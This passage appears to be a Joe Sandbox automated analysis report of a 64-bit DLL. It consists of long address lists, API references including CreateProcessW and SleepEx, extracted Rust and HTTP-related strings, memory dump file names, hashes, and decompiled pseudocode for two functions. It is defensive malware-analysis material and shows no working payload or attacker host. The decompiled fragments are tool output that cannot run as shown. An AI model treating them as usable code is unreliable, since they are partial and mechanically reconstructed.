0x7fef304c03b
0x7fef304c03e
0x7fef304c042
0x7fef304c045
0x7fef304c068
0x7fef304c06e
0x7fef304c078
0x7fef304c087
0x7fef304c08f
0x7fef304c09a
0x7fef304c0a4
0x7fef304c0b3
0x7fef304c0ba
0x7fef304c0c2
0x7fef304c0ca
0x7fef304c0d1
0x7fef304c0db
0x7fef304c0e3
0x7fef304c0ea
0x7fef304c0f9
0x7fef304c0fe
0x7fef304c101
0x7fef304c10f
0x7fef304c117
0x7fef304c125
0x7fef304c146
0x7fef304c14c
0x7fef304c157
0x7fef304c166
0x7fef304c175
0x7fef304c184
0x7fef304c18b
0x7fef304c193
0x7fef304c1a2
0x7fef304c1a9
0x7fef304c1b1
0x7fef304c1c3
0x7fef304c1cb
0x7fef304c1d1
0x7fef304c1d9
0x7fef304c1dc
0x7fef304c1f7
0x7fef304c1fd
0x7fef304c200
0x7fef304c20c
0x7fef304c217
0x7fef304c21a
0x7fef304c224
0x7fef304c22f
0x7fef304c23a
0x7fef304c242
0x7fef304c245
0x7fef304c24d
0x7fef304c258
0x7fef304c25e
0x7fef304c264
0x7fef304c26f
0x7fef304c275
0x7fef304c281
0x7fef304c288
0x7fef304c294
0x7fef304c29b
0x7fef304c2a0
0x7fef304c2a7
0x7fef304c2b1
0x7fef304c2ba
0x7fef304c2c8
0x7fef304c2dd
0x7fef304c2e5
0x7fef304c2ee
0x7fef304c2fe
0x7fef304c306
0x7fef304c311
0x7fef304c314
0x7fef304c31a
0x7fef304c31e
0x7fef304c322
0x7fef304c326
0x7fef304c32a
0x7fef304c335
0x7fef304c339
0x7fef304c33c
0x7fef304c340
0x7fef304c344
0x7fef304c348
0x7fef304c34c
0x7fef304c354
0x7fef304c358
0x7fef304c366
0x7fef304c36d
0x7fef304c374
0x7fef304c37c
0x7fef304c383
0x7fef304c38b
0x7fef304c39e
0x7fef304c3a9
0x7fef304c3b4
0x7fef304c3ba
0x7fef304c3c1
0x7fef304c3c8
0x7fef304c3d3
0x7fef304c3db
0x7fef304c3e2
0x7fef304c3f1
0x7fef304c3ff
0x7fef304c405
0x7fef304c415
0x7fef304c417
0x7fef304c420
0x7fef304c422
0x7fef304c42b
0x7fef304c439
0x7fef304c43d
0x7fef304c443
0x7fef304c44b
0x7fef304c453
0x7fef304c458
0x7fef304c465
0x7fef304c46a
0x7fef304c470
0x7fef304c475
0x7fef304c47e
0x7fef304c486
0x7fef304c48c
0x7fef304c497
0x7fef304c49a
0x7fef304c49f
0x7fef304c4a7
0x7fef304c4af
0x7fef304c4b7
0x7fef304c4bf
0x7fef304c4cb
0x7fef304c4d3
0x7fef304c4db
0x7fef304c4e3
0x7fef304c4ef
0x7fef304c4f2
0x7fef304c4fa
0x7fef304c506
0x7fef304c511
0x7fef304c51d
0x7fef304c52c
0x7fef304c533
0x7fef304c539
0x7fef304c549
0x7fef304c54d
0x7fef304c554
0x7fef304c55a
0x7fef304c561
0x7fef304c56a
0x7fef304c570
0x7fef304c575
0x7fef304c579
0x7fef304c580
0x7fef304c583
0x7fef304c585
0x7fef304c589
0x7fef304c58b
0x7fef304c591
0x7fef304c593
0x7fef304c598
0x7fef304c59d
0x7fef304c5a4
0x7fef304c5ab
0x7fef304c5ad
0x7fef304c5b5
0x7fef304c5b7
0x7fef304c5bc
0x7fef304c5c3
0x7fef304c5c8
0x7fef304c5ce
0x7fef304c5da
0x7fef304c5e3
0x7fef304c5f1
0x7fef304c5f9
0x7fef304c5fc
0x7fef304c60d
0x7fef304c616
0x7fef304c61f
0x7fef304c624
0x7fef304c63c
0x7fef304c642
0x7fef304c64a
0x7fef304c657
0x7fef304c65f
0x7fef304c667
0x7fef304c66f
0x7fef304c677
0x7fef304c67f
0x7fef304c687
0x7fef304c68e
0x7fef304c696
0x7fef304c69e
0x7fef304c6a6
0x7fef304c6b6
0x7fef304c6c1
0x7fef304c6c7
0x7fef304c6cf
0x7fef304c6d7
0x7fef304c6df
0x7fef304c6e7
0x7fef304c6ef
0x7fef304c6f7
0x7fef304c6ff
0x7fef304c707
0x7fef304c70f
0x7fef304c71f
0x7fef304c727
0x7fef304c72e
0x7fef304c735
0x7fef304c746
0x7fef304c754
0x7fef304c767
0x7fef304c76f
0x7fef304c777
0x7fef304c779
0x7fef304c781
0x7fef304c78b
0x7fef304c796
0x7fef304c79e
0x7fef304c7a6
0x7fef304c7ac
0x7fef304c7b0
0x7fef304c7b4
0x7fef304c7b8
0x7fef304c7c3
0x7fef304c7c8
0x7fef304c7cf
0x7fef304c7d3
0x7fef304c7da
0x7fef304c7e5
0x7fef304c7f6
0x7fef304c812
0x7fef304c81a
0x7fef304c822
0x7fef304c831
0x7fef304c83f
0x7fef304c846
0x7fef304c84e
0x7fef304c856
0x7fef304c85e
0x7fef304c86d
0x7fef304c875
0x7fef304c880
0x7fef304c886
0x7fef304c88e
0x7fef304c896
0x7fef304c89e
0x7fef304c8b4
0x7fef304c8bc
0x7fef304c8c4
0x7fef304c8cb
0x7fef304c8d2
0x7fef304c8da
0x7fef304c8e2
0x7fef304c8ea
0x7fef304c8f1
0x7fef304c8f9
0x7fef304c901
0x7fef304c909
0x7fef304c90f
0x7fef304c923
0x7fef304c926
0x7fef304c92f
0x7fef304c935
0x7fef304c949
0x7fef304c94e
0x7fef304c95f
0x7fef304c965
0x7fef304c976
0x7fef304c988
0x7fef304c993
0x7fef304c999
0x7fef304c99b
0x7fef304c9ae
0x7fef304c9b3
0x7fef304c9c0
0x7fef304c9c6
0x7fef304c9d8
0x7fef304c9f5
0x7fef304c9fb
0x7fef304ca08
0x7fef304ca0e
0x7fef304ca2d
0x7fef304ca33
0x7fef304ca45
0x7fef304ca47
0x7fef304ca52
0x7fef304ca61
0x7fef304ca70
0x7fef304ca74
0x7fef304ca7c
0x7fef304ca84
0x7fef304ca89
0x7fef304ca90
0x7fef304ca98
0x7fef304ca9f
0x7fef304cab0
0x7fef304cab2
0x7fef304caba
0x7fef304cad0
0x7fef304cad7
0x7fef304cadf
0x7fef304cae5
0x7fef304cae7
0x7fef304caed
0x7fef304caf2
0x7fef304cb16
0x7fef304cb1e
0x7fef304cb25
0x7fef304cb2d
0x7fef304cb35
0x7fef304cb3b
0x7fef304cb3f
0x7fef304cb45
0x7fef304cb49
0x7fef304cb4f
0x7fef304cb57
0x7fef304cb5f
0x7fef304cb71
0x7fef304cb74
0x7fef304cb7c
0x7fef304cb8e
0x7fef304cb96
0x7fef304cb9c
0x7fef304cb9f
0x7fef304cba7
0x7fef304cbaf
0x7fef304cbb7
0x7fef304cbbb
0x7fef304cbbf
0x7fef304cbca
0x7fef304cbce
0x7fef304cbd6
0x7fef304cbda
0x7fef304cbe5
0x7fef304cbed
0x7fef304cc0e
0x7fef304cc11
0x7fef304cc19
0x7fef304cc23
0x7fef304cc27
0x7fef304cc32
0x7fef304cc41
0x7fef304cc44
0x7fef304cc49
0x7fef304cc51
0x7fef304cc59
0x7fef304cc61
0x7fef304cc69
0x7fef304cc6d
0x7fef304cc71
0x7fef304cc7c
0x7fef304cc88
0x7fef304cca4
0x7fef304cca4
0x7fef304cca7
0x7fef304ccb2
0x7fef304ccbb
0x7fef304ccc9
0x7fef304ccd6
0x7fef304cce3
0x7fef304cce8
0x7fef304ccf0
0x7fef304ccf8
0x7fef304cd00
0x7fef304cd08
0x7fef304cd10
0x7fef304cd1f
0x7fef304cd23
0x7fef304cd2b
0x7fef304cd3b
0x7fef304cd53
0x7fef304cd63
0x7fef304cd78
0x7fef304cd8d
0x7fef304cd9d
0x7fef304cdad
0x7fef304cdb9
0x7fef304cdc0
0x7fef304cdc8
0x7fef304cdd0
0x7fef304cde0
0x7fef304cde8
0x7fef304cdf0
0x7fef304cdf8
0x7fef304ce00
0x7fef304ce08
0x7fef304ce10
0x7fef304ce18
0x7fef304ce28
0x7fef304ce48
0x7fef304ce5d
0x7fef304ce7a
0x7fef304ce88
0x7fef304ce99
0x7fef304cea8
0x7fef304ceb6
0x7fef304cec3
0x7fef304ced0
0x7fef304ced5
0x7fef304cedd
0x7fef304cee5
0x7fef304ceed
0x7fef304cef5
0x7fef304cefd
0x7fef304cf0c
0x7fef304cf10
0x7fef304cf18
0x7fef304cf28
0x7fef304cf40
0x7fef304cf50
0x7fef304cf65
0x7fef304cf7a
0x7fef304cf8a
0x7fef304cf9a
0x7fef304cf9f
0x7fef304cfa6
0x7fef304cfad
0x7fef304cfb4
0x7fef304cfbc
0x7fef304cfc4
0x7fef304cfd4
0x7fef304cfdc
0x7fef304cfe4
0x7fef304cfec
0x7fef304cff4
0x7fef304cffc
0x7fef304d004
0x7fef304d00c
0x7fef304d01c
0x7fef304d02c
0x7fef304d034
0x7fef304d03c
0x7fef304d049
0x7fef304d059
0x7fef304d05e
0x7fef304d068
0x7fef304d075
0x7fef304d079
0x7fef304d081
0x7fef304d089
0x7fef304d091
0x7fef304d099
0x7fef304d0a1
0x7fef304d0a9
0x7fef304d0b1
0x7fef304d0c0
0x7fef304d0cc
0x7fef304d0da
0x7fef304d0ed
0x7fef304d0f6
0x7fef304d103
0x7fef304d10b
0x7fef304d124
0x7fef304d139
0x7fef304d141
0x7fef304d14d
0x7fef304d15b
0x7fef304d160
0x7fef304d179
0x7fef304d181
0x7fef304d18a
0x7fef304d195
0x7fef304d198
0x7fef304d1a1
0x7fef304d1af
0x7fef304d1b4
0x7fef304d1b9
0x7fef304d1bc
0x7fef304d1c0
0x7fef304d1ce
0x7fef304d1de
0x7fef304d1e7
0x7fef304d1fa
0x7fef304d206
0x7fef304d20e
0x7fef304d21c
0x7fef304d22d
0x7fef304d23e
0x7fef304d252
0x7fef304d25a
0x7fef304d268
0x7fef304d26e
0x7fef304d273
0x7fef304d277
0x7fef304d27b
0x7fef304d28a
0x7fef304d295
0x7fef304d29d
0x7fef304d2ab
0x7fef304d2b1
0x7fef304d2b4
0x7fef304d2bc
0x7fef304d2c4
0x7fef304d2d0
0x7fef304d2db
0x7fef304d2e4
0x7fef304d2f3
0x7fef304d2f6
0x7fef304d2fd
0x7fef304d311

APIs

Part of subcall function 000007FEF305A520: GetProcessHeap.KERNEL32(?,?,?,000007FEF3068FDD), ref: 000007FEF305A534

HeapFree.KERNEL32 ref: 000007FEF304C125
HeapFree.KERNEL32 ref: 000007FEF304C3B4
HeapFree.KERNEL32 ref: 000007FEF304C42B
HeapFree.KERNEL32 ref: 000007FEF304C767
HeapFree.KERNEL32 ref: 000007FEF304D0ED
HeapFree.KERNEL32 ref: 000007FEF304D1DE
HeapFree.KERNEL32 ref: 000007FEF304D1FA
HeapFree.KERNEL32 ref: 000007FEF304D21C
HeapFree.KERNEL32 ref: 000007FEF304D23E
HeapFree.KERNEL32 ref: 000007FEF304D268
HeapFree.KERNEL32 ref: 000007FEF304D6EA
HeapFree.KERNEL32 ref: 000007FEF304D70C
HeapFree.KERNEL32 ref: 000007FEF304D741

Strings

accept-encodinggziprangeRequest deadline overflowed, xrefs: 000007FEF304C91C, 000007FEF304CA17
x, xrefs: 000007FEF304C4FA
called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF304DAD7, 000007FEF304DFA0
pW3, xrefs: 000007FEF304BFA6

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: Heap$Free$Process
String ID: accept-encodinggziprangeRequest deadline overflowed$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value$pW3$x
API String ID: 2719409998-84244287
Opcode ID: 808fc2fb364a8d61bd8230a53e362a724ed9f184c20c7c13d5b8899ace1bbfba
Instruction ID: 495bb81abcd236e9ecf4d474cef2f693be615e381cae34ca439db087b0008ba0
Opcode Fuzzy Hash: 808fc2fb364a8d61bd8230a53e362a724ed9f184c20c7c13d5b8899ace1bbfba
Instruction Fuzzy Hash: 88034776A09BC589E7B58B15E4403EAB3A5F788784F048126DBCC43B69EF3CD695DB00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF304F0D5 Relevance: 30.1, APIs: 12, Strings: 5, Instructions: 397
memoryprocessCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E000007FE7FEF304F0D5(long long __rax, void* __rbx, void* __rcx, long long __rdx, void* __rdi, void* __rsi, void* __rbp, void* __r12, void* __r13, void* __r14, void* __r15) {
				intOrPtr _v248;
				char _v264;
				char _v360;
				long long _v368;
				long long _v376;
				long long _v384;
				long long _v392;
				long long _v408;
				char _v432;
				long long _t38;
				long long _t39;
				long long _t44;
				long long _t54;
				void* _t61;
				intOrPtr* _t62;
				long long* _t67;
				long long _t70;
				void* _t71;

				_t54 = __rdx;
				_t61 = __rcx;
				_t44 =  *0xf319c078; // 0x3356b0
				_t70 =  *0xf319c088; // 0xa
				E000007FE7FEF30694DF(0, __rax, _t70);
				_v384 = __rax;
				_v376 = _t54;
				E000007FE7FEF30F1E10();
				_v368 = _t70;
				asm("movups xmm0, [edi]");
				asm("movaps [esp+0xc0], xmm0");
				_t38 =  *((intOrPtr*)(_t61 + 0x10));
				_v392 = _t38;
				_t39 = _t38 + 0x18;
				if (_t39 != 0x40) goto 0xf304f147;
				E000007FE7FEF306239E(_t39, __rsi +  *((intOrPtr*)(_t71 + _t38 + 0xc0)));
				_t67 =  &_v264;
				 *_t67 = _t39;
				 *((long long*)(_t67 + 8)) = _t44;
				 *((long long*)(_t67 + 0x10)) = 0;
				_t62 =  &_v408;
				E000007FE7FEF30535D0(_t67,  *_t62,  *((intOrPtr*)(_t62 + 0x10)));
				if (_t62 + 0x18 !=  &_v360) goto 0xf304f188;
				if ( *((long long*)(_t71 + _t67 + 0xc0)) == 0) goto 0xf304f1ca;
				HeapFree(??, ??, ??);
				if (_t67 + 0x18 != 0x38) goto 0xf304f1ac;
				E000007FE7FEF30515F0(_t39,  &_v432, _v264, _v248);
				_v408 = 0xf30f8c2f;
				asm("dec eax");
				asm("dec eax");
			}

0x7fef304f0d5
0x7fef304f0e8
0x7fef304f0eb
0x7fef304f0f2
0x7fef304f100
0x7fef304f105
0x7fef304f10d
0x7fef304f11e
0x7fef304f123
0x7fef304f12b
0x7fef304f12e
0x7fef304f136
0x7fef304f13a
0x7fef304f14f
0x7fef304f157
0x7fef304f15c
0x7fef304f161
0x7fef304f169
0x7fef304f16c
0x7fef304f170
0x7fef304f178
0x7fef304f192
0x7fef304f19e
0x7fef304f1b5
0x7fef304f1c8
0x7fef304f1d2
0x7fef304f1ec
0x7fef304f1f8
0x7fef304f20f
0x7fef304f224

APIs

HeapFree.KERNEL32 ref: 000007FEF304F1C8
HeapFree.KERNEL32 ref: 000007FEF304F52E
CreateProcessW.KERNEL32 ref: 000007FEF304F737
SleepEx.KERNEL32 ref: 000007FEF304F744
HeapFree.KERNEL32 ref: 000007FEF304F767
HeapFree.KERNEL32 ref: 000007FEF304F781
HeapFree.KERNEL32 ref: 000007FEF304F79B
HeapFree.KERNEL32 ref: 000007FEF304F7B7
HeapFree.KERNEL32 ref: 000007FEF304F7DC
HeapFree.KERNEL32 ref: 000007FEF304F7F9
HeapFree.KERNEL32 ref: 000007FEF304F820
HeapFree.KERNEL32 ref: 000007FEF304F842

Strings

Pf4, xrefs: 000007FEF304F30B
accept-encodinggziprangeRequest deadline overflowed, xrefs: 000007FEF304F3E9
called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF304F4F8
"Certificate, xrefs: 000007FEF304F319
h, xrefs: 000007FEF304F6E7

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap$CreateProcessSleep
String ID: accept-encodinggziprangeRequest deadline overflowed$"Certificate$Pf4$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value$h
API String ID: 3269885446-1296704571
Opcode ID: 8e9e2a800e91f8eae7f551279f7964ce4ea7210b13fd65c1be03ea73be48e456
Instruction ID: 9e798d7480200900578005be1be01bdb2849361324d1a390adaed5d9ec7dd4d5
Opcode Fuzzy Hash: 8e9e2a800e91f8eae7f551279f7964ce4ea7210b13fd65c1be03ea73be48e456
Instruction Fuzzy Hash: F312A076A09BC189E7A0CB15E8447AA73E6F7C8B84F448126DE8C43B68EF3CD595D700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30B4FBA Relevance: 23.5, APIs: 12, Strings: 3, Instructions: 977
memoryCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 23%

			E000007FE7FEF30B4FBA(void* __edx, void* __edi, void* __esi, void* __ebp, void* __esp, long long __rcx, void* __rdx, long long __r8) {
				signed short _t237;
				signed int _t244;
				void* _t279;
				intOrPtr _t282;
				void* _t283;
				void* _t312;
				void* _t319;
				void* _t341;
				intOrPtr* _t378;
				long long* _t380;
				long long _t387;
				long long _t391;
				short* _t392;
				intOrPtr _t393;
				long long _t419;
				long long _t422;
				long long _t432;
				long long* _t470;
				long long _t476;
				long long _t481;
				long long _t483;
				long long _t489;
				long long _t508;
				long long _t515;
				void* _t519;
				long long _t525;
				intOrPtr _t526;
				void* _t527;
				void* _t532;
				signed long long _t534;
				intOrPtr _t541;
				long long _t542;
				long long _t543;
				void* _t544;
				signed long long _t546;
				void* _t547;
				void* _t550;
				long long _t553;
				long long _t574;
				void* _t577;
				void* _t578;
				intOrPtr _t580;
				signed long long _t581;
				intOrPtr _t587;
				intOrPtr _t588;
				void* _t591;
				intOrPtr* _t593;
				long long _t595;

				_t319 = __esi;
				_t312 = __edi;
				 *((long long*)(_t550 + 0x88)) = __rcx;
				asm("movups xmm0, [edx]");
				asm("movups xmm1, [edx+0x10]");
				asm("movups xmm2, [edx+0x20]");
				_t542 = _t550 + 0x600;
				asm("movaps [ebp+0x20], xmm2");
				asm("movaps [ebp+0x10], xmm1");
				asm("movaps [ebp], xmm0");
				E000007FE7FEF30B66AC();
				_t476 =  *((intOrPtr*)(__rdx + 0x30));
				 *((long long*)(_t542 + 0x10)) =  *((intOrPtr*)(__r8 + 0x50));
				asm("movups xmm0, [ebx+0x40]");
				asm("movaps [ebp], xmm0");
				_t378 =  *((intOrPtr*)(__rdx + 0x38));
				asm("inc ecx");
				 *((intOrPtr*)(_t550 + 0x48)) =  *((intOrPtr*)(_t378 + 8));
				 *((long long*)(_t550 + 0x40)) =  *_t378;
				asm("movups [esp+0x30], xmm0");
				 *((long long*)(_t550 + 0x28)) = _t542;
				 *((long long*)(_t550 + 0x358)) = _t476;
				 *((long long*)(_t550 + 0x20)) = _t476;
				 *((long long*)(_t550 + 0x1f8)) = __r8;
				E000007FE7FEF30B67DC(_t279, _t283, __edx, __edi, __ebp, __esp, _t378, _t550 + 0x718, __r8,  *((intOrPtr*)(__r8 + 0x10)),  *((intOrPtr*)(__r8 + 0x20)), _t577, _t578);
				r8d = 0xb0;
				E000007FE7FEF30F1E10();
				asm("inc ecx");
				asm("inc ecx");
				asm("movaps [eax+0x10], xmm1");
				asm("movaps [eax], xmm0");
				_t380 = _t550 + 0x98;
				 *_t380 = 8;
				asm("xorps xmm0, xmm0");
				asm("movups [eax+0x8], xmm0");
				 *((long long*)(_t550 + 0x350)) = _t550 + 0x370 + _t380;
				_t591 = _t550 + 0x520;
				 *((long long*)(_t550 + 0x90)) = _t380 + _t591;
				asm("movaps xmm0, [esp+0x2c0]");
				asm("movaps xmm1, [esp+0x2d0]");
				asm("movaps [esp+0x2f0], xmm1");
				asm("movaps [esp+0x2e0], xmm0");
				r8b = 1;
				E000007FE7FEF30B6ED4(); // executed
				 *((long long*)(_t550 + 0x100)) =  *((intOrPtr*)(_t542 + 0x18));
				asm("movups xmm0, [ebp+0x8]");
				asm("movaps [esp+0xf0], xmm0");
				_t553 =  *((intOrPtr*)(_t550 + 0x620));
				_t574 =  *((intOrPtr*)(_t550 + 0x628));
				asm("movups xmm0, [ebp+0x30]");
				asm("movups xmm1, [ebp+0x3c]");
				asm("movups [esp+0x19c], xmm1");
				asm("movaps [esp+0x190], xmm0");
				r10d =  *((intOrPtr*)(_t550 + 0x64c));
				 *((long long*)(_t550 + 0x260)) =  *((intOrPtr*)(_t542 + 0x70));
				asm("movups xmm0, [ebp+0x50]");
				asm("movups xmm1, [ebp+0x60]");
				asm("movaps [esp+0x250], xmm1");
				asm("movaps [esp+0x240], xmm0");
				_t525 =  *((intOrPtr*)(_t550 + 0x680));
				r13b =  *(_t550 + 0x688);
				asm("movups xmm0, [edx+0x89]");
				asm("movups xmm1, [edx+0x99]");
				asm("movups xmm2, [edx+0xa8]");
				asm("movups [esp+0x38f], xmm2");
				asm("movaps [esp+0x380], xmm1");
				asm("movaps [esp+0x370], xmm0");
				_t432 =  *((intOrPtr*)(_t550 + 0x6b8));
				_t508 =  *((intOrPtr*)(_t550 + 0x6c0));
				_t543 =  *((intOrPtr*)(_t550 + 0x6c8));
				_t419 =  *((intOrPtr*)(_t550 + 0x6d0));
				 *((long long*)(_t550 + 0x60)) = _t525;
				 *((long long*)(_t550 + 0x70)) = _t553;
				 *((long long*)(_t550 + 0x78)) = _t574;
				 *((long long*)(_t550 + 0x50)) = _t432;
				 *((intOrPtr*)(_t550 + 0x58)) = r10d;
				 *((long long*)(_t550 + 0x68)) = _t508;
				 *((long long*)(_t550 + 0x80)) = _t543;
				if ( *((long long*)(_t550 + 0x600)) != 0) goto 0xf30b5e03;
				asm("movups xmm0, [edx+0xd8]");
				asm("movaps [esp+0x110], xmm0");
				asm("movaps xmm0, [esp+0xf0]");
				asm("movaps [esp+0x520], xmm0");
				 *((long long*)(_t550 + 0x530)) =  *((intOrPtr*)(_t550 + 0x100));
				 *((long long*)(_t550 + 0x538)) = _t553;
				 *((long long*)(_t550 + 0x540)) = _t574;
				asm("movups xmm0, [esp+0x19c]");
				asm("inc ecx");
				asm("movaps xmm0, [esp+0x190]");
				asm("inc ecx");
				 *((intOrPtr*)(_t550 + 0x564)) = r10d;
				 *((long long*)(_t591 + 0x68)) =  *((intOrPtr*)(_t550 + 0x260));
				asm("movaps xmm0, [esp+0x240]");
				asm("movaps xmm1, [esp+0x250]");
				asm("inc ecx");
				asm("inc ecx");
				 *((long long*)(_t550 + 0x590)) =  *((intOrPtr*)(_t550 + 0x678));
				 *((long long*)(_t550 + 0x598)) = _t525;
				 *(_t550 + 0x5a0) = r13b;
				asm("movups xmm0, [esp+0x38f]");
				asm("inc ecx");
				asm("movaps xmm0, [esp+0x370]");
				asm("movaps xmm1, [esp+0x380]");
				asm("inc ecx");
				asm("inc ecx");
				 *((long long*)(_t550 + 0x5d0)) = _t432;
				 *((long long*)(_t550 + 0x5d8)) = _t508;
				 *((long long*)(_t550 + 0x5e0)) = _t543;
				 *((long long*)(_t550 + 0x5e8)) = _t419;
				asm("movaps xmm0, [esp+0x110]");
				asm("movups [eax], xmm0");
				 *((long long*)(_t550 + 0x368)) = _t419;
				if ( *((intOrPtr*)(_t550 + 0x5f8)) + 0xfffffed4 - 0x63 >= 0) goto 0xf30b5b10;
				_t387 =  *((intOrPtr*)(_t550 + 0x460));
				if (_t432 == 0) goto 0xf30b5b10;
				_t481 =  *((intOrPtr*)(_t550 + 0xa8));
				 *((long long*)(_t550 + 0x360)) = _t481;
				if (_t481 + 1 - _t432 >= 0) goto 0xf30b5ef4;
				_t483 =  *((intOrPtr*)(_t550 + 0x5b0));
				r9d = 8;
				E000007FE7FEF30B7D80(_t319, _t387,  *(_t550 + 0x5a0), _t483, 0xf314c6d8, _t574);
				if (_t387 == 0) goto 0xf30b5b10;
				_t575 = _t483;
				 *((long long*)(_t550 + 0x510)) = _t387;
				 *((long long*)(_t550 + 0x518)) = _t483;
				 *((long long*)(_t550 + 0x608)) = _t419;
				 *((long long*)(_t550 + 0x600)) = _t550 + 0x488;
				 *((long long*)(_t550 + 0x618)) = _t419;
				_t544 = _t550 + 0x600;
				E000007FE7FEF30BF31F(__edx, __esp, _t387, _t550 + 0x2e0, _t544, _t387, _t483);
				if ( *((intOrPtr*)(_t550 + 0x30c)) != 2) goto 0xf30b54c8;
				dil =  *((intOrPtr*)(_t550 + 0x2e0));
				 *((long long*)(_t550 + 0xd0)) = _t550 + 0x510;
				 *((long long*)(_t550 + 0xd8)) = 0x7fef3096a50;
				 *((long long*)(_t550 + 0x130)) = 0xf314c738;
				 *((long long*)(_t550 + 0x138)) = 0xf314c738;
				 *((long long*)(_t550 + 0x140)) = _t419;
				 *((long long*)(_t550 + 0x150)) = _t550 + 0xd0;
				 *((long long*)(_t550 + 0x158)) = 0xf314c738;
				E000007FE7FEF3051840(_t544, _t550 + 0x130);
				 *((intOrPtr*)(_t550 + 0x644)) = 2;
				 *((long long*)(_t550 + 0x670)) = _t419;
				 *((char*)(_t550 + 0x680)) = 0;
				 *((long long*)(_t550 + 0x6c8)) = 2;
				r8d = _t312;
				E000007FE7FEF30B4CED(_t312, _t319, __esp, 0xf314c738, _t550 + 0x370, _t544);
				_t587 =  *((intOrPtr*)(_t550 + 0x438));
				if (_t587 == 3) goto 0xf30b54de;
				goto 0xf30b5f6c;
				_t526 = _t587;
				memcpy(_t312, _t319, 0xb);
				_t391 =  *((intOrPtr*)(_t550 + 0x380));
				 *((long long*)(_t550 + 0x120)) = _t391;
				asm("movups xmm0, [esp+0x370]");
				asm("movaps [esp+0x110], xmm0");
				asm("movups xmm1, [esp+0x388]");
				asm("movups xmm2, [ebx+0x28]");
				asm("movups xmm3, [ebx+0x34]");
				asm("movaps [esp+0xf0], xmm2");
				asm("movups [esp+0xfc], xmm3");
				asm("movups xmm2, [ebx+0x48]");
				asm("movaps [esp+0x190], xmm2");
				asm("movaps [esp+0x240], xmm0");
				 *((long long*)(_t550 + 0x250)) = _t391;
				asm("movups [esp+0x258], xmm1");
				asm("movups xmm0, [esp+0xfc]");
				_t392 = _t550 + 0x268;
				asm("movups [eax+0xc], xmm0");
				asm("movaps xmm0, [esp+0xf0]");
				asm("movups [eax], xmm0");
				 *((intOrPtr*)(_t550 + 0x284)) =  *((intOrPtr*)(_t550 + 0x3b4));
				asm("movaps xmm0, [esp+0x190]");
				asm("movups [eax+0x20], xmm0");
				if (_t392 - 0x12d - 3 >= 0) goto 0xf30b55c5;
				_t588 =  *((intOrPtr*)(_t550 + 0x480));
				if (_t588 == 4) goto 0xf30b561a;
				_t341 = _t588 - 3;
				if (_t341 != 0) goto 0xf30b5623;
				_t237 =  *( *(_t550 + 0x470)) & 0x0000ffff ^ 0x00004547;
				if (_t341 != 0) goto 0xf30b5623;
				goto 0xf30b5681;
				if (_t237 == 0x133) goto 0xf30b5645;
				if (_t237 != 0x134) goto 0xf30b5a41;
				_t593 =  *(_t550 + 0x470);
				if (_t526 == 0x40) goto 0xf30b5a41;
				if ( *((intOrPtr*)(_t526 + 0x7fef314c6e8)) !=  *((intOrPtr*)(_t550 + 0x480))) goto 0xf30b5614;
				if (E000007FE7FEF30F2860(( *(_t550 + 0x470))[1] & 0x000000ff ^ 0x00000054 | _t237,  *((intOrPtr*)(_t526 + 0xf314c6e0)), _t593,  *((intOrPtr*)(_t550 + 0x480))) == 0) goto 0xf30b5681;
				_t527 = _t526 + 0x10;
				goto 0xf30b55f0;
				if ( *_t593 == 0x44414548) goto 0xf30b5681;
				r14d = 3;
				E000007FE7FEF30694DF(0, _t392,  *((intOrPtr*)(_t526 + 0xf314c6e0)));
				 *_t392 = 0x4547;
				 *((char*)(_t392 + 2)) = 0x54;
				goto 0xf30b568b;
				_t595 =  *(_t550 + 0x470);
				_t590 =  *((intOrPtr*)(_t550 + 0x480));
				if (_t527 == 0x40) goto 0xf30b5a41;
				if ( *((intOrPtr*)(_t527 + 0x7fef314c6e8)) !=  *((intOrPtr*)(_t550 + 0x480))) goto 0xf30b567b;
				if (E000007FE7FEF30F2860(3,  *((intOrPtr*)(_t527 + 0xf314c6e0)), _t595,  *((intOrPtr*)(_t550 + 0x480))) == 0) goto 0xf30b5681;
				goto 0xf30b5657;
				_t489 =  *((intOrPtr*)(_t550 + 0x478));
				 *((intOrPtr*)(_t550 + 0x60)) = 0;
				_t393 =  *((intOrPtr*)(_t550 + 0x460));
				 *((long long*)(_t550 + 0x58)) = _t489;
				if ( *((char*)(_t393 + 0xce)) == 0) goto 0xf30b573e;
				E000007FE7FEF30C47F5(_t550 + 0x240,  *((intOrPtr*)(_t550 + 0x480)), _t483);
				 *((long long*)(_t550 + 0x50)) = _t489;
